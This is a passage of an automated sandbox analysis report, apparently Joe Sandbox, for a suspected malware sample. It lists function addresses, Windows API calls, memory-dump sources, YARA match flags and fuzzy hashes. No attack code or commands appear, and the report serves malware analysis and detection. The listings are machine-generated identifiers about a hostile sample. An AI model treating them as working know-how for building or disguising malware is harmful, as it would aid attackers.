                                                                                                                                                                                                                                              • Part of subcall function 0042E3ED: EnterCriticalSection.KERNEL32(?,?,00431C7A,?,00457A38,00000008,00431D48,?,?,?), ref: 0042E3FC
                                                                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 00434E05
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1272433827-0
                                                                                                                                                                                                                                            • Opcode ID: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
                                                                                                                                                                                                                                            • Instruction ID: 538c22e4eb892f32bc8c86ea5e443232934619ae82977abc573478e901e73d8c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4F04F32A103009FE710EF69D906B9D77E1AF05726F10416AF910DB2E2CB7999808F49
                                                                                                                                                                                                                                            Function 024CB4E9 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: GetLastError.KERNEL32(?,?,024BA9EC,?,00000000,?,024BCDE6,0249247E,00000000,?,00451F20), ref: 024C2145
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: _free.LIBCMT ref: 024C2178
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21B9
                                                                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,024CBCAB,024C0A1C,?,?,?,?,?,024C0A1C,?,?,?), ref: 024CB520
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2016158738-0
                                                                                                                                                                                                                                            • Opcode ID: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
                                                                                                                                                                                                                                            • Instruction ID: 0a90576f449ca22c4736491b66ea8d76071c4f71ddde581c8858cd95582c32da
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A5F0553A30020857CB089F3ADC0576BBF94EFC1764B2A005EEF098B390C7719842C790
                                                                                                                                                                                                                                            Function 0043B282 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,0043BA44,004307B5,?,?,?,?,?,004307B5,?,?,?), ref: 0043B2B9
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2016158738-0
                                                                                                                                                                                                                                            • Opcode ID: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
                                                                                                                                                                                                                                            • Instruction ID: ec76e124c96d5fb6d75208995366108955e3ecd697e122142a5eb02f601840fd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C8F0553A30020897CB089F7BE81976BBF90EFC5754F0A409EEF098B290C3399942C794
                                                                                                                                                                                                                                            Function 024A08CD Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00410672,0249FE60), ref: 024A08D2
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                                                                                            • Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                                                                                                                                                                                            • Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                            Function 00410666 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00010672,0040FBF9), ref: 0041066B
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                                                                                            • Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                                                                                                                                                                                            • Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                            Function 0043BBC1 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: HeapProcess
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 54951025-0
                                                                                                                                                                                                                                            • Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                                                                                                                                                                                                            • Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08
                                                                                                                                                                                                                                            Function 004373D9 Relevance: .6, Instructions: 637COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                                                                                                                                                                                                            • Instruction ID: 2844b30024e45351147ede59872166b67bb7d3639a7d84f230d679a3a0c0a750
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 32325761D69F014DE733A634C822336A258AFBB3D4F15E737E85AB5EA5EB2CC4834105
                                                                                                                                                                                                                                            Function 004071AB Relevance: .4, Instructions: 378COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
                                                                                                                                                                                                                                            • Instruction ID: d13affd36985adaba9549dda1076aa7943650852f65e7c6b0ce314185b1835a0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88E18470A08612EFD714CF24C590AAAB7F1FF44304B54457EE846ABB81D738F862DB96
                                                                                                                                                                                                                                            Function 024B76EB Relevance: .4, Instructions: 356COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
                                                                                                                                                                                                                                            • Instruction ID: 0d9c5e97eb769fe52307554ece7da4665c320b79a11dbfb4ca4a059b38443d36
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 96D1B6331085A24ADB6F4A3A84700BBFFF26E821A530D479FD4F7CA6C2EA24D555D670
                                                                                                                                                                                                                                            Function 024B7FCE Relevance: .3, Instructions: 254COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                            • Instruction ID: 4834b7865edd1a94633a77e7b6be4d9b6cbc1de95510be84c880d8db3e80f095
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B69122721090A34AEB6F463E85741BFFFE55E812A530A079FD4F2CA2C5EF248555DA30
                                                                                                                                                                                                                                            Function 00427D67 Relevance: .3, Instructions: 254COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                            • Instruction ID: b25d7b7a8e55bbee32d2fc67e28ff16be1cfeba2f71328b5531bdb6c5bdb1bbb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6491647230D0B34ADB294679953443FFFE15E523A135A07DFE4F2CA2C1EE289964D624
                                                                                                                                                                                                                                            Function 024B8289 Relevance: .2, Instructions: 244COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                            • Instruction ID: 6b294422089193adff9595540bd462b67c54910d460a54a17f1fff1e00cfa154
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 799140721090A34AEB6B467E85741BFFFE55E821A630A079FD4F2CA2C5FE24C165D630
                                                                                                                                                                                                                                            Function 00428022 Relevance: .2, Instructions: 244COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                            • Instruction ID: 19c93412fb5f9130a8e3bb0cb99d698500333008097130ff6794007c36a41420
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6591943230A0B34EEB294279943403FFFE15A523A135A07DFD4F2CA2C5EE189565E628
                                                                                                                                                                                                                                            Function 024B7D07 Relevance: .2, Instructions: 240COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                            • Instruction ID: 9798d8fffb95db3bf105ee70dbcca8f3b25c487433f8b1ebdb393c604614fcd0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 089132731090A20ADB6B463D85781BEFFE19EC11A570A079FE4F2CE2C5EE14D665D630
                                                                                                                                                                                                                                            Function 00427AA0 Relevance: .2, Instructions: 240COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                            • Instruction ID: d2c87871af4d92e544e05363471dd483cf2102058027b34f35735ca62f395a82
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0691937230D0B34ADB2D467AA47403EFFE15A523B139A079FD4F2CB2C1ED18D6659628
                                                                                                                                                                                                                                            Function 024BD755 Relevance: .2, Instructions: 237COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                                                                                                                                                                                                            • Instruction ID: 688709eccc1ef3f81edecbb1763f3103fff13e7f483b4a73f817d2801b0b7a58
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C1615631E00B05D6DE3B6A288890BFF63959F45A09F0408EFE886DB7C0D7159983C7B5
                                                                                                                                                                                                                                            Function 0042D4EE Relevance: .2, Instructions: 237COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
                                                                                                                                                                                                                                            • Instruction ID: 543360d7dfb9058b4a8e0476cf2bcab449255d23345d35b398e8df16a867321f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 856154B1F0073876DA385A2CB892BBF63849F41748FE4041BE447DB381D69DDD82865E
                                                                                                                                                                                                                                            Function 024B7A5D Relevance: .2, Instructions: 232COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                                            • Instruction ID: e5c583b9e42432bcbcce1d8c06ee20fb03f0bd12f5c2ea791361366529730c3b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 738132732080A349EB6B463984740BFFFF15E821A630A079FD4F2CA2C5EE148265D630
                                                                                                                                                                                                                                            Function 004277F6 Relevance: .2, Instructions: 232COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                                            • Instruction ID: 3d3f4059477c25f3e34474a921d34c240437fa272c48f742cc2d27251d9ebad1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E481737230D0B34AEB294679943843FFFE15A523A135A079FD4F2CA2C1EE188A64D624
                                                                                                                                                                                                                                            Function 024B87C7 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                            • Instruction ID: c76349d59dff7fe9183b9445d4fef866c30eb5f162c9bd02aa940add7f0fda4c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE11C477200042479E5B8A3ED8B46FBE79EEEC6228B2D567BD0414B758D322E145D620
                                                                                                                                                                                                                                            Function 00428560 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                            • Instruction ID: e183cc42c0575e46eff71331dfd644b760227977963c57612164f9205c38e507
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 631138773030B1A3D604862DF8B46BFA395EBE63217EC426FC0424B748CE6AE9C1950C
                                                                                                                                                                                                                                            Function 00B09BAB Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745494815.0000000000B09000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B09000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_b09000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                            • Instruction ID: 82654df803e126d51516b7bc965a57f00c951c3e847aac0e6037c8355dbe6a5d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D11AC72340100AFEB50DF59DCC1FA677EAEB88360B2980A5E908CB356E675E802C760
                                                                                                                                                                                                                                            Function 02490D90 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
